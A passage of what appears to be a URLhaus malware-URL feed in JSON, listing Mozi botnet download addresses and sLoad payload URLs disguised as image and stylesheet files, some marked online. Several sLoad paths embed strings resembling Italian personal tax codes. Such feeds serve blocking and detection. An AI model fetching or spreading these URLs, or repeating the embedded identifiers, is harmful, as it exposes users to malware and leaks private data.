+{"id":"961520","urlhaus_reference":"https://urlhaus.abuse.ch/url/961520/","url":"http://103.217.121.228:41349/Mozi.m","url_status":"offline","host":"103.217.121.228","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961521","urlhaus_reference":"https://urlhaus.abuse.ch/url/961521/","url":"http://111.92.81.255:48586/Mozi.m","url_status":"offline","host":"111.92.81.255","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961522","urlhaus_reference":"https://urlhaus.abuse.ch/url/961522/","url":"http://45.229.55.75:38111/Mozi.m","url_status":"offline","host":"45.229.55.75","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961518","urlhaus_reference":"https://urlhaus.abuse.ch/url/961518/","url":"http://182.121.242.148:34556/Mozi.m","url_status":"online","host":"182.121.242.148","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961519","urlhaus_reference":"https://urlhaus.abuse.ch/url/961519/","url":"http://106.115.189.249:59815/Mozi.m","url_status":"online","host":"106.115.189.249","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961516","urlhaus_reference":"https://urlhaus.abuse.ch/url/961516/","url":"http://182.117.93.110:50587/bin.sh","url_status":"online","host":"182.117.93.110","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961517","urlhaus_reference":"https://urlhaus.abuse.ch/url/961517/","url":"http://110.251.5.169:48322/Mozi.m","url_status":"online","host":"110.251.5.169","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961515","urlhaus_reference":"https://urlhaus.abuse.ch/url/961515/","url":"http://101.51.117.186:33317/Mozi.m","url_status":"online","host":"101.51.117.186","date_added":"2021-01-14 21:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961513","urlhaus_reference":"https://urlhaus.abuse.ch/url/961513/","url":"http://121.151.78.166:41516/Mozi.m","url_status":"online","host":"121.151.78.166","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961514","urlhaus_reference":"https://urlhaus.abuse.ch/url/961514/","url":"http://116.72.92.97:57798/Mozi.m","url_status":"online","host":"116.72.92.97","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961509","urlhaus_reference":"https://urlhaus.abuse.ch/url/961509/","url":"http://27.218.15.209:47671/Mozi.m","url_status":"online","host":"27.218.15.209","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961510","urlhaus_reference":"https://urlhaus.abuse.ch/url/961510/","url":"http://120.85.171.210:57690/Mozi.m","url_status":"online","host":"120.85.171.210","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961511","urlhaus_reference":"https://urlhaus.abuse.ch/url/961511/","url":"http://117.251.59.53:50611/i","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961512","urlhaus_reference":"https://urlhaus.abuse.ch/url/961512/","url":"http://115.58.83.167:34141/Mozi.m","url_status":"online","host":"115.58.83.167","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961507","urlhaus_reference":"https://urlhaus.abuse.ch/url/961507/","url":"http://94.178.124.83:44399/Mozi.m","url_status":"online","host":"94.178.124.83","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961508","urlhaus_reference":"https://urlhaus.abuse.ch/url/961508/","url":"http://182.122.75.232:49120/Mozi.m","url_status":"online","host":"182.122.75.232","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961506","urlhaus_reference":"https://urlhaus.abuse.ch/url/961506/","url":"http://115.63.202.43:51136/Mozi.m","url_status":"online","host":"115.63.202.43","date_added":"2021-01-14 20:52:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961504","urlhaus_reference":"https://urlhaus.abuse.ch/url/961504/","url":"http://59.99.40.204:45773/Mozi.m","url_status":"online","host":"59.99.40.204","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961505","urlhaus_reference":"https://urlhaus.abuse.ch/url/961505/","url":"http://117.247.128.213:56528/Mozi.m","url_status":"online","host":"117.247.128.213","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961500","urlhaus_reference":"https://urlhaus.abuse.ch/url/961500/","url":"http://14.137.219.132:44427/Mozi.a","url_status":"online","host":"14.137.219.132","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961501","urlhaus_reference":"https://urlhaus.abuse.ch/url/961501/","url":"http://42.224.40.14:36134/Mozi.m","url_status":"online","host":"42.224.40.14","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961502","urlhaus_reference":"https://urlhaus.abuse.ch/url/961502/","url":"http://186.33.104.107:43973/Mozi.m","url_status":"online","host":"186.33.104.107","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961503","urlhaus_reference":"https://urlhaus.abuse.ch/url/961503/","url":"http://85.105.16.154:41319/Mozi.m","url_status":"online","host":"85.105.16.154","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961496","urlhaus_reference":"https://urlhaus.abuse.ch/url/961496/","url":"http://178.141.73.115:51847/Mozi.a","url_status":"online","host":"178.141.73.115","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961497","urlhaus_reference":"https://urlhaus.abuse.ch/url/961497/","url":"http://186.33.104.135:54469/Mozi.m","url_status":"online","host":"186.33.104.135","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961498","urlhaus_reference":"https://urlhaus.abuse.ch/url/961498/","url":"http://115.56.159.43:34547/Mozi.m","url_status":"online","host":"115.56.159.43","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961499","urlhaus_reference":"https://urlhaus.abuse.ch/url/961499/","url":"http://42.230.138.170:33932/Mozi.m","url_status":"online","host":"42.230.138.170","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961494","urlhaus_reference":"https://urlhaus.abuse.ch/url/961494/","url":"https://univirtek.com/viro/02478080035/blank.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961495","urlhaus_reference":"https://urlhaus.abuse.ch/url/961495/","url":"https://univirtek.com/viro/FRRNDR77C25D325O/map.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961492","urlhaus_reference":"https://urlhaus.abuse.ch/url/961492/","url":"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961493","urlhaus_reference":"https://urlhaus.abuse.ch/url/961493/","url":"https://letonguesc.com/leto/02328510512/logo.css","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:51:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961490","urlhaus_reference":"https://urlhaus.abuse.ch/url/961490/","url":"https://cxminute.com/minu/MLILSN74B21E507L/uk.png","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961491","urlhaus_reference":"https://urlhaus.abuse.ch/url/961491/","url":"https://cxminute.com/minu/12875710159/blank.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961489","urlhaus_reference":"https://urlhaus.abuse.ch/url/961489/","url":"https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961488","urlhaus_reference":"https://urlhaus.abuse.ch/url/961488/","url":"https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:51:40 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961487","urlhaus_reference":"https://urlhaus.abuse.ch/url/961487/","url":"https://belfetproduction.com/bella/01844510469/1x1.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:51:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961485","urlhaus_reference":"https://urlhaus.abuse.ch/url/961485/","url":"https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961486","urlhaus_reference":"https://urlhaus.abuse.ch/url/961486/","url":"https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:51:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961482","urlhaus_reference":"https://urlhaus.abuse.ch/url/961482/","url":"https://univirtek.com/viro/06389650018/it.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961483","urlhaus_reference":"https://urlhaus.abuse.ch/url/961483/","url":"https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:51:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961484","urlhaus_reference":"https://urlhaus.abuse.ch/url/961484/","url":"https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961480","urlhaus_reference":"https://urlhaus.abuse.ch/url/961480/","url":"https://univirtek.com/viro/SBNPQL78A24A783E/uk.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961481","urlhaus_reference":"https://urlhaus.abuse.ch/url/961481/","url":"https://cxminute.com/minu/15578761007/maps.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961478","urlhaus_reference":"https://urlhaus.abuse.ch/url/961478/","url":"https://univirtek.com/viro/03079590133/1x1.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961479","urlhaus_reference":"https://urlhaus.abuse.ch/url/961479/","url":"https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961476","urlhaus_reference":"https://urlhaus.abuse.ch/url/961476/","url":"https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961477","urlhaus_reference":"https://urlhaus.abuse.ch/url/961477/","url":"https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961470","urlhaus_reference":"https://urlhaus.abuse.ch/url/961470/","url":"https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961471","urlhaus_reference":"https://urlhaus.abuse.ch/url/961471/","url":"https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg","url_status":"offline","host":"fhivelifestyle.online","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961472","urlhaus_reference":"https://urlhaus.abuse.ch/url/961472/","url":"https://belfetproduction.com/bella/05739900487/1x1.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961473","urlhaus_reference":"https://urlhaus.abuse.ch/url/961473/","url":"https://belfetproduction.com/bella/01767180597/map.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961474","urlhaus_reference":"https://urlhaus.abuse.ch/url/961474/","url":"https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961475","urlhaus_reference":"https://urlhaus.abuse.ch/url/961475/","url":"https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961468","urlhaus_reference":"https://urlhaus.abuse.ch/url/961468/","url":"https://cxminute.com/minu/08035410722/logo.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961469","urlhaus_reference":"https://urlhaus.abuse.ch/url/961469/","url":"https://univirtek.com/viro/GRNZEI60M13G346L/en.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:50:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961467","urlhaus_reference":"https://urlhaus.abuse.ch/url/961467/","url":"https://letonguesc.com/leto/03253350239/1x1.png","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961464","urlhaus_reference":"https://urlhaus.abuse.ch/url/961464/","url":"https://ladiesincode.com/ladi/10582470158/uk.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:50:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961465","urlhaus_reference":"https://urlhaus.abuse.ch/url/961465/","url":"https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:50:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961466","urlhaus_reference":"https://urlhaus.abuse.ch/url/961466/","url":"https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:50:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961461","urlhaus_reference":"https://urlhaus.abuse.ch/url/961461/","url":"https://univirtek.com/viro/CTTNDR89A19B149W/maps.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961462","urlhaus_reference":"https://urlhaus.abuse.ch/url/961462/","url":"https://cxminute.com/minu/DRSNTN77B16I197U/logo.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961463","urlhaus_reference":"https://urlhaus.abuse.ch/url/961463/","url":"https://univirtek.com/viro/02941830735/uk.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961458","urlhaus_reference":"https://urlhaus.abuse.ch/url/961458/","url":"https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961459","urlhaus_reference":"https://urlhaus.abuse.ch/url/961459/","url":"https://ladiesincode.com/ladi/03108100615/it.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961460","urlhaus_reference":"https://urlhaus.abuse.ch/url/961460/","url":"https://cxminute.com/minu/PTACSM56A31F604X/en.png","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961455","urlhaus_reference":"https://urlhaus.abuse.ch/url/961455/","url":"https://univirtek.com/viro/00183050368/en.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:39 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961456","urlhaus_reference":"https://urlhaus.abuse.ch/url/961456/","url":"https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:49:39 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961457","urlhaus_reference":"https://urlhaus.abuse.ch/url/961457/","url":"https://letonguesc.com/leto/08658331007/blank.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:39 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961450","urlhaus_reference":"https://urlhaus.abuse.ch/url/961450/","url":"https://cxminute.com/minu/01098910324/blank.png","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961451","urlhaus_reference":"https://urlhaus.abuse.ch/url/961451/","url":"https://univirtek.com/viro/02794390233/uk.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961452","urlhaus_reference":"https://urlhaus.abuse.ch/url/961452/","url":"https://univirtek.com/viro/CSTDNT69D63F754D/en.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961453","urlhaus_reference":"https://urlhaus.abuse.ch/url/961453/","url":"https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961454","urlhaus_reference":"https://urlhaus.abuse.ch/url/961454/","url":"https://univirtek.com/viro/03610140125/map.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961448","urlhaus_reference":"https://urlhaus.abuse.ch/url/961448/","url":"https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:49:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961449","urlhaus_reference":"https://urlhaus.abuse.ch/url/961449/","url":"https://univirtek.com/viro/RSTFRZ57T05G337C/maps.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961447","urlhaus_reference":"https://urlhaus.abuse.ch/url/961447/","url":"https://letonguesc.com/leto/LBRFNC56S10D952D/map.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961444","urlhaus_reference":"https://urlhaus.abuse.ch/url/961444/","url":"https://univirtek.com/viro/01669890194/it.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961445","urlhaus_reference":"https://urlhaus.abuse.ch/url/961445/","url":"https://letonguesc.com/leto/GTNNTN60P12H632S/maps.css","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961446","urlhaus_reference":"https://urlhaus.abuse.ch/url/961446/","url":"https://cxminute.com/minu/ZHOXBN72B06Z210N/en.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961442","urlhaus_reference":"https://urlhaus.abuse.ch/url/961442/","url":"https://letonguesc.com/leto/KHNGGR61S21Z112Y/uk.css","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961443","urlhaus_reference":"https://urlhaus.abuse.ch/url/961443/","url":"https://ladiesincode.com/ladi/MNRMNL75A12I531F/uk.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961438","urlhaus_reference":"https://urlhaus.abuse.ch/url/961438/","url":"https://ladiesincode.com/ladi/RBGMNL67A02L675L/uk.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:49:05 